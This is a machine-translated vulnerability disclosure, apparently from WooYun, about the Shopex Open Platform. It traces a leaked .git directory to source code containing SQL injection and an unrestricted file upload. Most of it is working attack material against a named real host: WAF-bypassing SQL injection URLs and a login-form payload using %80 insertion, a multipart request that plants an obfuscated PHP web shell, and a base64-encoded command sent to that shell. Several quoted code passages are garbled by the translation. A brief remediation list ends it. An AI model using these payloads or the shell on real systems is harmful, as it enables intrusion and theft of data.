Shopex Open Platform SQL injection and Getshell
SQL Injection.
BBScan scanned a git information leak:
http://open.shopex.cn/.git/
Use the rip-git.pl to download the source code.
Source code audit finds an SQL injection:
Open.shopex.cn \ core \ application \ controllers \ docs. php:
/*** API Search list page ** @ access public ** @ return void */public function api_search ($ category_id) {$ this-> data ['navigations '] [] = array ('name' => 'development document', 'url' => ''); $ this-> data ['navigations '] [] = array ('name' => 'api document', 'url' => site_url ('/docs/api_list /'. $ category_id); $ platform_id = isset ($ _ GET ['Platform _ id'])? $ _ GET ['Platform _ id']: 0; $ docs_keyword = isset ($ _ GET ['docs _ keyword'])? Trim (urldecode ($ _ GET ['docs _ keyword']): ''; $ method_type_id = isset ($ _ GET ['method _ type_id '])? $ _ GET ['method _ type_id ']: 0; /***** change the layout of the Development document page */$ this-> Layout-> layout ('doc _ details');/***** load the API list model, and get the API List Data */$ this-> load-> model ('method _ type_model '); $ api_list_data_temp = $ this-> method_type_model-> get_api_list_all (); foreach ($ api_list_data_temp as $ k => $ v) {$ api_list_data [$ v ['id'] = $ v ;} $ this-> data ['api _ list_data '] = $ api_list_data; /***** supported platform list */$ this-> load-> model ('Platform _ model'); $ plat Form_list = $ this-> platform_model-> get_platform_list (); $ this-> data ['Platform _ list'] = $ platform_list; /***** condition filtering */$ conditions = '1 = 1'; if ($ platform_id> 0) {$ conditions. = 'AND pm. platform_id = '. $ platform_id;} if ($ docs_keyword! = '') {$ Conditions. = 'AND (m. name like "% '. $ docs_keyword. '% "OR m. introduction like "% '. $ docs_keyword. '% ")';}/*** filter on the left using */$ this-> load-> model ('method _ model '); $ filter_method_list = $ this-> method_model-> get_method_search_list ($ conditions); // interface list $ method_type_id_array = array (); foreach ($ filter_method_list as $ k => $ v) {$ method_type_id_array [] = $ v ['method _ type_id '];} if ($ method_type_id> 0) {$ conditions. =' AND mthm. method_type_id = '. $ method_type_id;}/***** load the API model */$ this-> load-> model ('method _ model '); $ method_list_temp = $ this-> method_model-> get_method_search_list ($ conditions); // interface list foreach ($ method_list_temp as $ k => $ v) {$ temp = isset ($ api_list_data [$ v ['method _ type_id '])? $ Api_list_data [$ v ['method _ type_id '] ['name']: 'temp'; $ method_list_group [$ temp] [] = $ v ;} $ this-> data ['method _ list_group '] = $ method_list_group; $ this-> data ['method _ type_id_array'] = $ method_type_id_array; $ this-> data ['docs _ keyword'] = $ docs_keyword; $ this-> data ['Platform _ id'] = $ platform_id; $ this-> data ['category _ id'] = $ category_id; $ this-> data ['method _ type_id '] = $ method_type_id; // current list ID $ this-> layout-> view ('docs/api_search ', $ this-> data );}
Three parameters have SQL injection:
platform_id docs_keyword method_type_id
You can find that you have submitted the following information:
WooYun: Shopex SQL Injection somewhere on the Open Platform
WooYun: an SQL injection vulnerability exists on Shopex's official platform.
WooYun: ShopEx injection to a substation
The vulnerability is not fixed, but is on waf.
The program is a CI framework, and the UTF-8 characters in the parameters are filtered out by default. Therefore, you can insert a % 80 keyword to bypass waf.
http://open.shopex.cn/docs/api_search/1?platform_id=1/extractvalue(1,concat%20(0x7e,us%80er(),0x3a,ver%80sion()))%23
Continue to flip the code and find an arbitrary file to upload:
Open.shopex.cn \ core \ application \ controllers \ uploads. php:
Class Uploads extends CI_Controller {/*** homepage image Upload ** @ access public */public function home_img () {if (empty ($ _ FILES ['image']) {$ this-> _ return_msg ('fail ',' the format of the uploaded content is incorrect! ');} If (substr ($ _ FILES ['image'] ['type'], 0, 5 )! = 'Image') {$ this-> _ return_msg ('fail ',' check whether the image is uploaded! ');} $ Image_name = $ _ FILES ['image'] ['name']; $ image_name_exp = explode ('. ', $ image_name); $ image_name = date ('ymdhis '). mt_rand (0, 1 ). '. '. $ image_name_exp [1]; $ uploadfile = FCPATH. 'uploads/home_img /'. $ image_name; move_uploaded_file ($ _ FILES ['image'] ['tmp _ name'], $ uploadfile ); $ data ['img '] = base_url ('/uploads/home_img /'. $ image_name); $ this-> _ return_msg ('succ', 'success', $ data );}...
Attackers can exploit the php multipart/form-data parsing vulnerability to bypass waf and upload php shells:
POST /index.php/uploads/home_img HTTP/1.1User-Agent: curl/7.33.0Host: open.shopex.cnAccept: */*Proxy-Connection: Keep-AliveContent-Length: 341Content-Type: multipart/form-data; boundary=----,xxoo------,xxooContent-Disposition: form-data; name="image"; filename="1.jpg"Content-Type: image/png------Content-Disposition: form-data; name="image"; filename="1.php"Content-Type: image/png<script language="php">@preg_replace('/./e','@'.str_rot13('riny').'(bas'.'e64_decode($_POST[c]))', 'x');</script>------------,xxoo--
Shell:
http://open.shopex.cn/uploads/home_img/201512122130440.php
POST /uploads/home_img/201512122130440.php HTTP/1.1User-Agent: curl/7.33.0Host: open.shopex.cnAccept: */*Proxy-Connection: Keep-AliveContent-Length: 34Content-Type: application/x-www-form-urlencodedc=ZWNobyBgaWQ7cHdkO2xhc3QgLTIwYDs=
There is also an SQL injection:
POST /index.php/passport/passport/login HTTP/1.1Host: 122.144.135.142Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36Content-Type: application/x-www-form-urlencodedAccept-Language: zh-CN,zh;q=0.8Cookie: PHPSESSID=368fe31461cc0ba9a3e38c0334145b35; CNZZDATA3868185=cnzz_eid%3D1466070748-1449902718-%26ntime%3D1449902718Content-Length: 131biz_id=&entid=')or updatexml(1,co%80ncat(0x7e,us%80er(),ver%80sion()),1)#&pwd=xx&auth_code=cqac&subOk=%E7%99%BB%E5%BD%95&logOk=true
Solution:
Delete the. git directory or prohibit access;
Fix SQL injection .;
The upload function limits suffixes and user permission control.